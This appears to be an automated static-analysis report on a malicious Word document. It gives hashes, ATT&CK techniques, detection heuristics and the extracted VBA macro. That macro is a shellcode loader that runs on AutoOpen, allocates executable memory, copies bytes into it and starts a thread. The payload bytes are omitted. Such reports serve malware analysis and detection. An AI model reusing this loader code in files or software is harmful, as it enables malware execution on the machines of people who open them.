Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4135f92055dba1fe…

MALICIOUS

Office (OLE)

Size: 236.5 KB
Created: 2018-10-15 23:10:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: a82cdb9f5bffcb24708e66eb52cce2af
SHA-1: 8106a30bd35526bded384627d8eebce15da35d17
SHA-256: 4135f92055dba1fedafe70a8e094623889a2a53f173a8913b016667e5bc7d264
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that exploits CVE-2007-3899, a memory corruption vulnerability. The AutoOpen macro uses VBA to call Windows APIs like VirtualAlloc, LoadLibraryA, and GetProcAddress, indicating it's designed to load and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Prince-6923178-0' further supports its role as a dropper.

Heuristics 9

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical, CVE likely, CVE_2007_3899)
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Dropper.Prince-6923178-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Prince-6923178-0
  • Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY)
  • Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS)
  • Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script:
    '``````````````````````````````````````````````````````````````````````````````````
    Sub AutoOpen()
        On Error GoTo LoneSpirit
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21350 bytes
SHA-256: c35197a45a24c685429d45496d00efff9065dae1e9140180346b5e40e9fe3629
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function SharpShooter Lib "msvcrt" Alias "_beginthread" (ByVal StartAddress As LongPtr, StackSize As Long, ByVal ArgList As LongPtr) As Long
Private Declare PtrSafe Function efasdv Lib "kernel32" Alias "VirtualAlloc" (ByVal address As Long, ByVal size As Long, ByVal aloctype As Long, ByVal fprot As Long) As LongPtr
Private Declare PtrSafe Function gzsdfasd Lib "kernel32" Alias "RtlMoveMemory" (ByVal dest As LongPtr, ByRef src As Any, ByVal dlen As Long) As LongPtr
Private Declare PtrSafe Function ennfiaje Lib "kernel32" Alias "LoadLibraryA" (ByVal libname As String) As LongPtr
Private Declare PtrSafe Function dnnaigej Lib "kernel32" Alias "GetProcAddress" (ByVal module As LongPtr, ByVal pname As String) As LongPtr
'``````````````````````````````````````````````````````````````````````````````````
Sub AutoOpen()
    On Error GoTo LoneSpirit
'``````````````````````````````````````````````````````````````````````````````````

Dim BlockCount As Long, yefawfq As Long
BlockCount = 3
yefawfq = 3224
Dim llsodiplo(2) As Variant
Dim grqwasf(3224) As Byte

' [byte arrays assigned to llsodiplo(0) through llsodiplo(2) omitted]
'``````````````````````````````````````````````````````````````````````````````````
    Dim gweasdf As LongPtr, qwdzxcv As LongPtr, wetqdawe As LongPtr
    Dim rising_sun As String
    rising_sun = "kernel32"
    gweasdf = ennfiaje(rising_sun)
    qwdzxcv = dnnaigej(gweasdf, "LoadLibraryA")
    wetqdawe = dnnaigej(gweasdf, "GetProcAddress")
    Dim twefasfg As Long, rgggsdfa As Long
    twefasfg = 1265
    rgggsdfa = 1283
'``````````````````````````````````````````````````````````````````````````````````
    Dim eIndex1 As Long, eIndex2 As Long, eValue As Long
    Dim vAddress As LongPtr, Result As LongPtr
    vAddress = efasdv(0, yefawfq, &H1000, &H40)
    yefawfq = 0
'``````````````````````````````````````````````````````````````````````````````````
    For eIndex1 = 0 To BlockCount - 1
        For eIndex2 = 0 To UBound(llsodiplo(eIndex1))
            eValue = llsodiplo(eIndex1)(eIndex2)
            grqwasf(yefawfq) = eValue
            yefawfq = yefawfq + 1
        Next eIndex2
    Next eIndex1
'``````````````````````````````````````````````````````````````````````````````````
    Result = gzsdfasd(VarPtr(grqwasf(twefasfg)), qwdzxcv, 8)
    Result = gzsdfasd(VarPtr(grqwasf(rgggsdfa)), wetqdawe, 8)
'``````````````````````````````````````````````````````````````````````````````````
    For eIndex1 = 0 To yefawfq - 1
        eValue = grqwasf(eIndex1)
        Result = gzsdfasd(vAddress + eIndex1, eValue, 1)
    Next eIndex1
    Dim LMCooperator As Long
    LMCooperator = SharpShooter(vAddress, 0, 0)
    ThisDocument.Close
    Exit Sub
LoneSpirit:
End Sub